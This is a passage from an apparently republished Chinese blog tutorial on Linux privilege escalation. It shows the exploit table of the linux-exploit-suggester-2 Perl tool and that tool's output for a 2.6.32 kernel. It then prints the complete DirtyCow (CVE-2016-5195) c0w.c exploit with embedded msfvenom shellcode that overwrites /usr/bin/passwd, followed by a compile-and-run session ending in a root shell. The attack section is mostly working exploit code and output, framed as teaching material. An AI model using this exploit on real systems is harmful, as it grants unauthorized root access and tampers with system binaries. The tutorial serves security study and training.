'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33',
],
cve => '2010-3081',
mil => 'http://www.exploit-db.com/exploits/15024',
},
'memodipper' => {
vuln => [
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0',
],
cve => '2012-0056',
mil => 'http://www.exploit-db.com/exploits/18411',
},
'semtex' => {
vuln => [
'2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
'3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0',
],
cve => '2013-2094',
mil => 'http://www.exploit-db.com/exploits/25444',
},
'perf_swevent' => {
vuln => [
'3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
'3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
'3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
'3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
'3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
'3.8.8', '3.8.9',
],
cve => '2013-2094',
mil => 'http://www.exploit-db.com/exploits/26131',
},
'msr' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
'2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
'2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
'3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6',
'3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.5.0', '3.6.0',
'3.7.0', '3.7.6',
],
cve => '2013-0268',
mil => 'http://www.exploit-db.com/exploits/27297',
},
'timeoutpwn' => {
vuln => [
'3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.9',
'3.9.0', '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.5', '3.8.6',
'3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6', '3.11.0',
'3.12.0', '3.13.0', '3.13.1'
],
cve => '2014-0038',
mil => 'http://www.exploit-db.com/exploits/31346',
},
'rawmodePTY' => {
vuln => [
'2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
'2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
],
cve => '2014-0196',
mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
},
'overlayfs' => {
vuln => [
'3.13.0', '3.16.0', '3.19.0'
],
cve => '2015-8660',
mil => 'http://www.exploit-db.com/exploits/39230',
},
'pp_key' => {
vuln => [
'3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
'3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
'3.8.8', '3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6',
'3.11.0', '3.12.0', '3.13.0', '3.13.1'
],
cve => '2016-0728',
mil => 'http://www.exploit-db.com/exploits/39277',
},
'dirty_cow' => {
vuln => [
'2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
'2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
'3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
'3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
'4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
],
cve => '2016-5195',
mil => 'http://www.exploit-db.com/exploits/40616',
},
'af_packet' => {
vuln => ['4.4.0' ],
cve => '2016-8655',
mil => 'http://www.exploit-db.com/exploits/40871',
},
'packet_set_ring' => {
vuln => ['4.8.0' ],
cve => '2017-7308',
mil => 'http://www.exploit-db.com/exploits/41994',
},
'clone_newuser' => {
vuln => [
'3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1',
'3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
],
cve => 'NA',
mil => 'http://www.exploit-db.com/exploits/38390',
},
'get_rekt' => {
vuln => [
'4.4.0', '4.8.0', '4.10.0', '4.13.0'
],
cve => '2017-16695',
mil => 'http://www.exploit-db.com/exploits/45010',
},
'exploit_x' => {
vuln => [
'2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
'2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
'3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
'3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
'4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
],
cve => '2018-14665',
mil => 'http://www.exploit-db.com/exploits/45697',
},
);
}
__END__
=head1 NAME
linux_exploit_suggester-2.pl - A local exploit suggester for linux
=head1 DESCRIPTION
This perl script will enumerate the possible exploits available for a given kernel version
=head1 USAGE
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.
=head1 AUTHOR
Jonathan Donas (c) 2019
=head1 CHANGELOG
27-03-2019 added exploit download menu
31-12-2018 added exploit_x
30-11-2018 added get_rekt
15-04-2018 added clone_newuser
23-11-2017 added packet_set_ring
05-11-2017 added af_packet
28-04-2017 added dirty_cow
25-07-2016 added overlayfs and pp_key
=cut
=head1 LICENSE
Linux Exploit Suggester 2
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
=cut
运行工具会列出linux可能存在的内核漏洞,
ser@debian:~/tools/kernel-exploits/linux-exploit-suggester-2$ perl linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.32
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[5] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[6] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[8] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[9] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[10] ptrace_kmod2
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[11] rawmodePTY
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[12] rds
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[13] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[14] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
在列出的信息中看到存在"Dirty COW",利用代码如下
user@debian:~/tools/kernel-exploits/dirtycow$ cat c0w.c
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
* madvise 0
* ptrace 0
* $ /usr/bin/passwd
* [root@server foo]# whoami
* root
* [root@server foo]# id
* uid=0(root) gid=501(foo) groups=501(foo)
* @KrE80r
*/
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
void *madviseThread(void *arg) {
int i,c=0;
for(i=0;i<200000000;i++)
c+=madvise(map,100,MADV_DONTNEED);
printf("madvise %dnn",c);
}
int main(int argc,char *argv[]){
printf(" n
(___) n
(o o)_____/ n
@@ ` \ n
\ ____, /%s n
// // n
^^ ^^ n
", suid_binary);
char *backup;
printf("DirtyCow root privilege escalationn");
printf("Backing up %s to /tmp/bakn", suid_binary);
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f=open(suid_binary,O_RDONLY);
fstat(f,&st);
map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %xnn",map);
pid=fork();
if(pid){
waitpid(pid,NULL,0);
int u,i,o,c=0,l=sc_len;
for(i=0;i<10000/l;i++)
for(o=0;o<l;o++)
for(u=0;u<10000;u++)
c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
printf("ptrace %dnn",c);
}
else{
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(),SIGSTOP);
pthread_join(pth,NULL);
}
return 0;
}
使用gcc编译该代码并运行
user@debian:~/tools/kernel-exploits/dirtycow$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~/tools/kernel-exploits/dirtycow$ ls
c0w c0w.c
user@debian:~/tools/kernel-exploits/dirtycow$ ./c0w
(___)
(o o)_____/
@@ `
____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 4ea71000
^C
user@debian:~/tools/kernel-exploits/dirtycow$ /usr/bin/passwd
root@debian:/home/user/tools/kernel-exploits/dirtycow# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)原文始发于微信公众号(安全小白):Linux提权(二)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论